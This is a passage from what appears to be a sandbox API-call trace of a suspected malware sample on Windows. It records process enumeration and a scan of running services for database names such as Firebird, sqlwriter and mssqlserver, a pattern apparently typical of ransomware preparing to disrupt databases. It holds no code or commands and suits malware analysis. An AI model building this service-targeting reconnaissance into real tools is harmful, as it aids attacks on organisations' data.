	[0031.153] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0031.153] lstrlenW (lpString="explorer.exe") returned 12
	[0031.153] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0031.154] lstrlenW (lpString="spoolsv.exe") returned 11
	[0031.154] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0031.154] lstrlenW (lpString="taskhost.exe") returned 12
	[0031.154] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.155] lstrlenW (lpString="svchost.exe") returned 11
	[0031.155] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0031.155] lstrlenW (lpString="taskeng.exe") returned 11
	[0031.155] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0031.156] lstrlenW (lpString="taskhost.exe") returned 12
	[0031.156] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0031.156] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0031.156] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0031.156] lstrlenW (lpString="python tragedy.exe") returned 18
	[0031.156] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0031.157] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0031.157] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0031.157] lstrlenW (lpString="computers.exe") returned 13
	[0031.157] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0031.158] lstrlenW (lpString="separated.exe") returned 13
	[0031.158] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0031.158] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0031.158] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0031.159] lstrlenW (lpString="darkness.exe") returned 12
	[0031.159] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0031.159] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0031.159] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0031.160] lstrlenW (lpString="sophisticated.exe") returned 17
	[0031.160] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0031.160] lstrlenW (lpString="wishlist.exe") returned 12
	[0031.160] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0031.161] lstrlenW (lpString="top.exe") returned 7
	[0031.161] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0031.161] lstrlenW (lpString="implemented.exe") returned 15
	[0031.161] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0031.162] lstrlenW (lpString="comp.exe") returned 8
	[0031.162] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0031.162] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0031.162] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0031.163] lstrlenW (lpString="solved.exe") returned 10
	[0031.163] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0031.163] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0031.163] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0031.164] lstrlenW (lpString="trips.exe") returned 9
	[0031.164] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0031.164] lstrlenW (lpString="tumormanual.exe") returned 15
	[0031.164] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0031.164] lstrlenW (lpString="telecom.exe") returned 11
	[0031.165] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0031.165] lstrlenW (lpString="realistic.exe") returned 13
	[0031.165] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0031.165] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0031.165] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0031.166] lstrlenW (lpString="dllhost.exe") returned 11
	[0031.166] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0031.166] lstrlenW (lpString="dllhost.exe") returned 11
	[0031.166] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0031.167] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0031.167] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0031.167] lstrlenW (lpString="cmd.exe") returned 7
	[0031.167] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0
	[0031.168] CloseHandle (hObject=0x11c) returned 1
	[0031.168] Sleep (dwMilliseconds=0x1f4) 
	[0032.932] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df30a8
	[0032.933] EnumServicesStatusExW (in: hSCManager=0x7df30a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0032.933] GetLastError () returned 0xea
	[0032.933] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x11e4) returned 0xb4324d8
	[0032.933] EnumServicesStatusExW (in: hSCManager=0x7df30a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4324d8, cbBufSize=0x11e4, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4324d8, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0032.934] CloseServiceHandle (hSCObject=0x7df30a8) returned 1
	[0032.934] lstrlenW (lpString="Appinfo") returned 7
	[0032.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0032.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0032.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0032.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0032.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0032.934] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0032.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0032.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0032.934] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0032.934] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0032.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0032.934] lstrlenW (lpString="AudioSrv") returned 8
	[0032.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0032.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0032.935] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0032.935] lstrlenW (lpString="BFE") returned 3
	[0032.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0032.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0032.935] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0032.935] lstrlenW (lpString="CryptSvc") returned 8
	[0032.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0032.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0032.935] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0032.935] lstrlenW (lpString="CscService") returned 10
	[0032.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0032.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0032.935] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0032.935] lstrlenW (lpString="DcomLaunch") returned 10
	[0032.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0032.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0032.935] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0032.935] lstrlenW (lpString="Dhcp") returned 4
	[0032.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0032.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0032.935] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0032.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0032.935] lstrlenW (lpString="Dnscache") returned 8
	[0032.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0032.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0032.936] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0032.936] lstrlenW (lpString="DPS") returned 3
	[0032.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0032.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0032.936] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0032.936] lstrlenW (lpString="eventlog") returned 8
	[0032.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0032.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0032.936] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0032.936] lstrlenW (lpString="EventSystem") returned 11
	[0032.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0032.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0032.936] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0032.936] lstrlenW (lpString="gpsvc") returned 5
	[0032.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0032.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0032.936] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0032.936] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0032.936] lstrlenW (lpString="iphlpsvc") returned 8
	[0032.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0032.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0032.936] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0032.936] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0032.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0032.937] lstrlenW (lpString="LanmanServer") returned 12
	[0032.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0032.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0032.937] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0032.937] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0032.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0032.937] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0032.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0032.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0032.937] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0032.937] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0032.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0032.937] lstrlenW (lpString="lmhosts") returned 7
	[0032.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0032.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0032.937] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0032.937] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0032.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0032.937] lstrlenW (lpString="MMCSS") returned 5
	[0032.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0032.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0032.937] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0032.937] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0032.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0032.937] lstrlenW (lpString="MpsSvc") returned 6
	[0032.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0032.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0032.937] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0032.937] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0032.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0032.937] lstrlenW (lpString="Netman") returned 6
	[0032.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0032.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0032.937] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0032.937] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0032.938] lstrlenW (lpString="netprofm") returned 8
	[0032.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0032.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0032.938] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0032.938] lstrlenW (lpString="NlaSvc") returned 6
	[0032.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0032.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0032.938] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0032.938] lstrlenW (lpString="nsi") returned 3
	[0032.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0032.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0032.938] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0032.938] lstrlenW (lpString="PcaSvc") returned 6
	[0032.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0032.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0032.938] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0032.938] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0032.938] lstrlenW (lpString="PlugPlay") returned 8
	[0032.938] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0032.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0032.939] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0032.939] lstrlenW (lpString="Power") returned 5
	[0032.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0032.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0032.939] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0032.939] lstrlenW (lpString="ProfSvc") returned 7
	[0032.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0032.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0032.939] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0032.939] lstrlenW (lpString="RpcEptMapper") returned 12
	[0032.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0032.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0032.939] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
